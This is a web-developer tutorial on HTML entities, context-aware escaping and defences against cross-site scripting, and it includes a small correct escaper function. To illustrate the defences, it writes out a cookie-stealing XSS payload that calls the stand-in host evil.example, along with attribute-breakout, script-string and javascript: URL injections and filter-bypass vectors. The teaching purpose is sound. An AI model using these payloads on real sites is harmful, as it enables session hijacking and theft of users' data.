HTML Entities and Escaping: Avoiding Broken Markup and XSS

Most rendering bugs and a large share of web security holes come down to one question: was this text treated as data, or as markup? HTML escaping is how you answer that question consistently, and getting it right is the difference between a clean page and a cross-site scripting (XSS) hole.

What an HTML entity actually is

An HTML entity is a way to represent a character using a sequence of plain ASCII text so the browser doesn't interpret it as part of the markup language. Entities come in two forms:

Named entities like `&lt;`, `&gt;`, `&amp;`, and `&quot;`. Each maps to a specific character.
Numeric character references like `&#60;` (decimal) or `&#x3C;` (hexadecimal), both of which produce `<`.

When the browser's parser encounters `&lt;`, it renders a literal less-than sign on the page instead of starting a tag. That single substitution is the entire mechanism behind both correct display and a major class of injection defense.
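To make the two numeric forms concrete, here is a minimal sketch that builds the decimal and hexadecimal reference for a single character. The helper name `numericReferences` is hypothetical and exists only for this illustration.

```javascript
// Hypothetical helper: build both numeric character references for one character.
function numericReferences(ch) {
  const codePoint = ch.codePointAt(0);
  return {
    decimal: `&#${codePoint};`,
    hex: `&#x${codePoint.toString(16).toUpperCase()};`,
  };
}

console.log(numericReferences('<')); // { decimal: '&#60;', hex: '&#x3C;' }
```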

The characters that matter

The browser decides what is markup and what is text using a small set of special characters. These are the ones you must be able to neutralize:

Character	Why it's dangerous	Entity
`<`	Opens a tag	`&lt;`
`>`	Closes a tag	`&gt;`
`&`	Starts an entity reference	`&amp;`
`"`	Terminates a double-quoted attribute	`&quot;`
`'`	Terminates a single-quoted attribute	`&#39;` or `&apos;`

The ampersand is the one people forget. If you escape `<` to `&lt;` but leave a raw `&` alone, then content like `Tom & Jerry &lt;b&gt;` can produce ambiguous or double-decoded output: the browser decodes the entity-like text the user typed literally and shows `<b>` instead. Always escape `&` first, before anything else, so you never re-escape the ampersands you just introduced.
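The ordering rule is easy to check by running both orders on the same input. The sketch below handles only `&` and `<` to keep the comparison short; the function names are hypothetical.

```javascript
// Wrong order: the "&" introduced by "&lt;" gets escaped a second time.
function escapeWrongOrder(s) {
  return s.replace(/</g, '&lt;').replace(/&/g, '&amp;');
}

// Right order: ampersands first, then the remaining characters.
function escapeRightOrder(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;');
}

const input = 'Tom & Jerry <b>';
console.log(escapeWrongOrder(input)); // Tom &amp; Jerry &amp;lt;b>
console.log(escapeRightOrder(input)); // Tom &amp; Jerry &lt;b>
```

With the wrong order, the page would display the literal text `&lt;b>` rather than `<b>`.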

Why you escape: the two failure modes

There are two distinct reasons to escape, and conflating them leads to sloppy fixes.

Broken markup

If a user types a product review that says `I rate this 3 < 5 stars`, and you drop that string straight into your HTML, you are relying on the parser's error recovery. The HTML parser treats a `<` followed by a space or a digit as text, but a `<` followed directly by a letter, as in `price<value`, starts a tag. When that happens, the rest of your paragraph may vanish, the layout may collapse, or the page may swallow content until it finds a stray `>`. This is a correctness bug, not necessarily a security one, but it is the same root cause.

Cross-site scripting (XSS)

Now imagine the user types this instead:

html
<script>fetch('https://evil.example/steal?c='+document.cookie)</script>

If that lands unescaped in your page, the browser executes it. The attacker's JavaScript now runs in your origin, with access to your users' session cookies, local storage, and the full DOM. Escaping `<` to `&lt;` turns that payload into harmless visible text: the browser displays the characters and never runs them.

XSS is not exotic. It is almost always plain text that wasn't escaped before being concatenated into HTML.

Context-aware escaping

The single most important idea in this article: escaping depends on where the data lands. "HTML-escape everything" is a good default but an incomplete rule, because HTML has several sub-languages, each with its own special characters.

HTML text content

Between tags, like `<p>HERE</p>`, you need to handle `<`, `>`, and `&`. This is the most common case and the one most libraries default to.

html
<p>3 &lt; 5 &amp; rising</p>

HTML attributes

Inside an attribute you also have to escape the quote character that delimits the attribute, or the value can break out:

html
<!-- Dangerous: value breaks out of the quotes -->
<input value=""><script>alert(1)</script>">

<!-- Safe: quote is escaped -->
<input value="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;">

Always quote your attributes. An unquoted attribute can be ended by a space, making it far harder to escape safely.

JavaScript and CSS contexts

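HTML escaping is the wrong tool inside a `<script>` or `<style>` block, where the parser does not decode entities, and it is not enough inside a `style` attribute, where entities are decoded before the CSS parser ever sees the value. If you put user data into JavaScript, the right tool is JSON encoding or JavaScript string escaping, not `&lt;`. A frequent mistake: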

html
<script>
  // HTML-escaping here does nothing useful and can break the JS
  var name = "USER_INPUT";
</script>

If `USER_INPUT` contains `";attackerCode();//`, you have script injection even though there's not a single `<` involved. The fix is to serialize the value as JSON (`JSON.stringify`), additionally escaping `<` as `\u003c` so that a `</script>` inside the data cannot close the block, and, ideally, to avoid generating inline script from untrusted data at all.
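A minimal sketch of script-context serialization follows, assuming the value must be embedded in an inline `<script>` block. The helper name `toScriptLiteral` is hypothetical. `JSON.stringify` handles quotes and backslashes; the extra replacements cover a `</script>` inside the data and two line-separator characters that older JavaScript engines treat as line terminators.

```javascript
// Hypothetical helper: serialize a value for embedding inside a <script> block.
function toScriptLiteral(value) {
  return JSON.stringify(value)
    // Keep "</script>" or "<!--" in the data from ending or confusing the block.
    .replace(/</g, '\\u003c')
    // U+2028 and U+2029 terminate lines in older JavaScript engines.
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

const userInput = '";attackerCode();//</script>';
const snippet = `<script>var name = ${toScriptLiteral(userInput)};</script>`;
console.log(snippet);
```

The output is still valid JSON, so `JSON.parse` recovers the original string unchanged.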

URLs

A value placed in an `href` or `src` needs URL encoding, plus a scheme check. HTML-escaping a URL does nothing to stop `javascript:alert(1)` from running when clicked. Validate that the scheme is `http`, `https`, or `mailto` before trusting it.
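The scheme check can be sketched with the standard `URL` class, which normalizes the scheme to lowercase before you compare it. The helper name `safeUrl` and the decision to reject relative URLs are assumptions made for this example; the returned string still needs attribute escaping when written into markup.

```javascript
// Schemes this sketch accepts; URL.protocol includes the trailing colon.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// Hypothetical helper: return the normalized URL if its scheme is allowed, else null.
function safeUrl(raw) {
  let url;
  try {
    url = new URL(raw); // throws on relative or malformed input
  } catch {
    return null;
  }
  return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
}

console.log(safeUrl('https://example.com/a b')); // https://example.com/a%20b
console.log(safeUrl('JaVaScRiPt:alert(1)'));     // null
```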

The takeaway: pick the escaping function that matches the destination context. The same byte of user input may need three different treatments depending on whether it lands in text, an attribute, a script string, or a URL.

Named vs numeric entities

For the security-critical characters, named and numeric entities are interchangeable in effect:

`&lt;` and `&#60;` and `&#x3C;` all render `<`.
`&amp;` and `&#38;` both render `&`.

Practical guidance:

Named entities are more readable for the common set (`&lt;`, `&gt;`, `&amp;`, `&quot;`). Prefer them in hand-written markup.
Numeric references are universal. Any Unicode code point can be written as `&#NNNN;` or `&#xHHHH;`, which matters for characters that have no named entity.
`&apos;` is risky in old contexts. It is valid in HTML5 but was not defined in HTML 4 (it comes from XML), and it historically failed in older browsers and some email rendering paths. When escaping single quotes defensively, `&#39;` is the safer choice.

A defensive escaper that emits numeric references for the dangerous set is a perfectly reasonable design, and it sidesteps the `&apos;` compatibility wrinkle entirely.
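One way such an escaper might look is sketched below. The names `NUMERIC_REFS` and `escapeHtmlNumeric` are hypothetical. Because it replaces every character in a single pass, the ordering concern for `&` does not arise.

```javascript
// Numeric character references for the five dangerous characters.
const NUMERIC_REFS = {
  '&': '&#38;',
  '<': '&#60;',
  '>': '&#62;',
  '"': '&#34;',
  "'": '&#39;',
};

// Hypothetical escaper that emits only numeric references.
function escapeHtmlNumeric(s) {
  // One pass over the input, so output ampersands are never re-scanned.
  return String(s).replace(/[&<>"']/g, (ch) => NUMERIC_REFS[ch]);
}

console.log(escapeHtmlNumeric(`<a href='x'>Tom & "Jerry"</a>`));
// &#60;a href=&#39;x&#39;&#62;Tom &#38; &#34;Jerry&#34;&#60;/a&#62;
```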

If you want to inspect exactly what a given snippet decodes to, or convert a block of text to its escaped form, our HTML entity encoder and decoder does the round-trip and runs entirely in your browser, so nothing you paste leaves your device.

Common mistakes

Escaping on input instead of output

A recurring anti-pattern is to escape data the moment it arrives and store the escaped version in the database. This breaks the moment the same data is used in a non-HTML context: an email, a JSON API, a CSV export, or a PDF. You end up with `&amp;` showing up in plain-text emails. Store raw, escape at output, where you know the exact destination context.
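As a rough sketch of "store raw, escape at output", the same stored string below is encoded differently for each destination. The variable names and the `toCsvField` helper are hypothetical; the CSV quoting follows the common convention of doubling embedded quotes.

```javascript
// The stored value stays raw; each output path applies its own encoding.
const storedName = 'Tom & "Jerry" <admin>';

// Compact HTML escaper; "&" is replaced first.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// CSV: wrap the field in quotes and double any embedded quotes.
function toCsvField(s) {
  return `"${String(s).replace(/"/g, '""')}"`;
}

const asHtml = `<p>${escapeHtml(storedName)}</p>`;
const asJson = JSON.stringify({ name: storedName });
const asCsv = toCsvField(storedName);
const asPlainText = `Hello, ${storedName}`; // plain-text email: no escaping

console.log(asHtml);      // <p>Tom &amp; &quot;Jerry&quot; &lt;admin&gt;</p>
console.log(asCsv);       // "Tom & ""Jerry"" <admin>"
```

Had the database held the HTML-escaped form, the JSON, CSV, and email outputs would all carry stray `&amp;` and `&quot;` sequences.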

Double escaping

If you escape a value twice, `&` becomes `&amp;` becomes `&amp;amp;`, and users see literal `&amp;` on the page. This usually happens when a template engine auto-escapes and your code also escapes manually. Know whether your framework escapes by default (most modern ones do for interpolated values) and don't stack a second pass on top.

Trusting a blocklist of "dangerous" strings

Blocklisting `<script>` or stripping the word "javascript" is not escaping and does not work. Attackers use `<img src=x onerror=...>`, SVG event handlers, mixed-case `JaVaScRiPt:`, and dozens of other vectors. Encode the structural characters; don't try to outguess every payload.

Forgetting the attribute quote

Escaping `<` and `>` but not the quote character leaves attribute-context injection wide open, as shown above. If your data goes in an attribute, the delimiter quote is non-negotiable.

Marking strings as "safe" to silence the framework

Every templating system has an escape hatch (`dangerouslySetInnerHTML`, `|safe`, `v-html`, `mark_safe`). Each one disables the auto-escaping that was protecting you. Reserve these for HTML you generated yourself and never for anything derived from user input without sanitization.

A minimal correct escaper

For HTML text and double-quoted attribute contexts, this small function covers the dangerous set in the correct order:

javascript
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')   // must be first
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

This is deliberately small. It is correct for text and quoted-attribute output, and it is not a substitute for JSON encoding in script contexts or URL encoding in `href` values. Real applications should lean on their framework's context-aware auto-escaping rather than hand-rolling this everywhere; the snippet exists to show that the core mechanism is simple and to make the ordering explicit.
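To give a feel for what auto-escaping does under the hood, here is a toy sketch built on a JavaScript tagged template. The `html` tag is hypothetical and far simpler than a real framework: it escapes every interpolated value for text and quoted-attribute contexts only, and knows nothing about script or URL contexts.

```javascript
// Same escaper as above, repeated so the sketch is self-contained.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')   // must be first
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical tag: literal parts pass through, interpolated values are escaped.
function html(strings, ...values) {
  return strings.reduce(
    (out, literal, i) =>
      out + literal + (i < values.length ? escapeHtml(values[i]) : ''),
    ''
  );
}

const review = '<script>alert(1)</script>';
console.log(html`<p title="${'a "quoted" title'}">${review}</p>`);
// <p title="a &quot;quoted&quot; title">&lt;script&gt;alert(1)&lt;/script&gt;</p>
```

The template author writes the markup, and only the interpolated data is escaped, which is why escaping it again by hand would double-escape.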

Layers beyond escaping

Escaping is the primary defense, but pair it with a couple of cheap reinforcements:

A Content-Security-Policy that disallows inline scripts turns many would-be XSS payloads into nothing, even if an escape slips.
HttpOnly cookies keep session tokens out of reach of any script that does execute.

Neither replaces escaping; both reduce the blast radius when something gets through.
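Both reinforcements are response headers. The sketch below shows one possible shape; the helper name `securityHeaders`, the cookie name `session`, and the specific policy string are assumptions for illustration, and a real policy has to be tuned to the resources your pages load.

```javascript
// Hypothetical helper: response headers that add the two reinforcements.
function securityHeaders(sessionToken) {
  return {
    // Without 'unsafe-inline', inline <script> blocks and inline event handlers are refused.
    'Content-Security-Policy': "default-src 'self'; script-src 'self'",
    // HttpOnly hides the cookie from document.cookie; Secure and SameSite are extra hardening.
    'Set-Cookie': `session=${encodeURIComponent(sessionToken)}; HttpOnly; Secure; SameSite=Lax; Path=/`,
  };
}

// Possible usage with Node's built-in http module, where res is the response object:
// for (const [name, value] of Object.entries(securityHeaders(token))) {
//   res.setHeader(name, value);
// }
console.log(securityHeaders('abc 123'));
```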

Seeing it in practice

The fastest way to build intuition is to watch escaped and unescaped markup render side by side. Paste a snippet with raw `<` and `&` into our live HTML preview and then escape it to see how the same string flips from broken or executable to inert, readable text. If you only remember one rule from this article, make it this: decide what context the data lands in, escape for that context at the moment of output, and never trust a string to escape itself.
